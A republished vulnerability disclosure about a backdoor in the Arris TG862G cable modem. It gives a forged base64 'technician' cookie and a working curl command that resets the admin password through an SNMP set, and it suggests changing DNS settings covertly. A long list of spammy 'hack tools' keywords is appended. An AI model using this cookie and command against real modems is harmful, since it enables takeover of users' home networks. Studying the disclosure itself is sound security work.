22 de ago. de 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related word

  1. Hack Tool Apk No Root
  2. Easy Hack Tools
  3. How To Install Pentest Tools In Ubuntu
  4. How To Hack
  5. Hacking Tools Free Download
  6. Hacker Tools Online
  7. Hacking App
  8. Hacker Tools 2019
  9. Hack Tools For Ubuntu
  10. Pentest Tools Website Vulnerability
  11. Pentest Tools Kali Linux
  12. Free Pentest Tools For Windows
  13. Hacking Tools For Pc
  14. Android Hack Tools Github
  15. Hacker Tools List
  16. Free Pentest Tools For Windows
  17. Hack Website Online Tool
  18. Hacker Tools For Pc
  19. Hacker Hardware Tools
  20. How To Make Hacking Tools
  21. Hacking Tools Software
  22. Hacker Tools Free
  23. Pentest Tools For Android
  24. Pentest Tools Apk
  25. How To Install Pentest Tools In Ubuntu
  26. Hack Tools Mac
  27. Hacking Tools
  28. Github Hacking Tools
  29. Hacker Tools Windows
  30. Pentest Tools Framework
  31. Best Hacking Tools 2019
  32. How To Install Pentest Tools In Ubuntu
  33. Install Pentest Tools Ubuntu
  34. Hacking Tools Usb
  35. What Are Hacking Tools
  36. Hacker Search Tools
  37. Hacker Tools For Windows
  38. Hack Tools Github
  39. Hacker Tools Software
  40. Hacker Tools For Mac
  41. Hacks And Tools
  42. Hacker Tools Windows
  43. Hack Tools For Games
  44. Ethical Hacker Tools
  45. Pentest Tools Apk
  46. New Hack Tools
  47. Hacker Tools For Windows
  48. Hack Tools Pc
  49. Hack Tools For Games
  50. Hack Tools For Mac
  51. Hack Tools Github
  52. Computer Hacker
  53. Hacker Hardware Tools
  54. Tools 4 Hack
  55. Hacking Apps
  56. Hacking Tools For Pc
  57. Hacker Tools Apk Download
  58. Hacking Tools Free Download
  59. Pentest Tools Tcp Port Scanner
  60. Hacking Tools Hardware
  61. Hacking Tools Mac
  62. Nsa Hack Tools Download
  63. Pentest Tools Url Fuzzer
  64. Game Hacking
  65. Hacking Tools Mac
  66. Hacking Tools Windows 10
  67. Hacker Tools Apk
  68. Pentest Tools Online
  69. Hacker Security Tools
  70. Hack Tools Online
  71. Pentest Tools Framework
  72. Hacker Hardware Tools
  73. Tools 4 Hack
  74. Hacker Tools Online
  75. Hack App
  76. Hacker Security Tools
  77. Hack Tools
  78. Hacking Tools
  79. Hack Tools For Games
  80. Pentest Tools Github
  81. Pentest Tools Android
  82. Black Hat Hacker Tools
  83. Pentest Tools Github
  84. Pentest Tools For Ubuntu
  85. Hacker Search Tools
  86. Termux Hacking Tools 2019
  87. Pentest Reporting Tools
  88. Hacking Tools For Games
  89. Pentest Tools Subdomain
  90. Tools Used For Hacking
  91. Pentest Tools For Mac
  92. Physical Pentest Tools
  93. Pentest Tools Find Subdomains
  94. How To Install Pentest Tools In Ubuntu
  95. Easy Hack Tools
  96. Hack Tool Apk
  97. Tools 4 Hack
  98. How To Install Pentest Tools In Ubuntu
  99. Pentest Recon Tools
  100. Pentest Tools Review
  101. What Is Hacking Tools
  102. Hack Tools For Pc
  103. Hacker Techniques Tools And Incident Handling
  104. Hack Tools Github
  105. Hacking Tools For Kali Linux
  106. Hacker Tools List
  107. Bluetooth Hacking Tools Kali
  108. Pentest Tools List
  109. Hacker Tools Mac
  110. Github Hacking Tools
  111. How To Hack
  112. Hack Tool Apk No Root
  113. Hackrf Tools
  114. Hacking Tools For Kali Linux
  115. Hack Apps
  116. Nsa Hacker Tools
  117. Easy Hack Tools
  118. Hacking Tools Name
  119. What Is Hacking Tools
  120. Hacking Tools Free Download
  121. Pentest Tools Subdomain
  122. Hacking Tools Windows
  123. Pentest Tools Framework
  124. Hacking Tools For Windows Free Download
  125. Hacker Tools
  126. Hack Tools For Games
  127. Pentest Tools Framework
  128. Hacker Tools Software
  129. Hacker Tools Apk Download
  130. How To Install Pentest Tools In Ubuntu
  131. Pentest Tools Windows
  132. Hacks And Tools
  133. Hacker Tools Software
  134. Hack Tools
  135. New Hack Tools
  136. Hacking Tools For Mac
  137. Install Pentest Tools Ubuntu
  138. Hack Rom Tools
  139. Hack Tool Apk No Root
  140. Hack Tools Download
  141. Pentest Tools
  142. Hacking Tools
  143. Hacker Tools Apk Download
  144. Hack Tools Online
  145. What Are Hacking Tools
  146. Pentest Tools For Android
  147. Computer Hacker
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)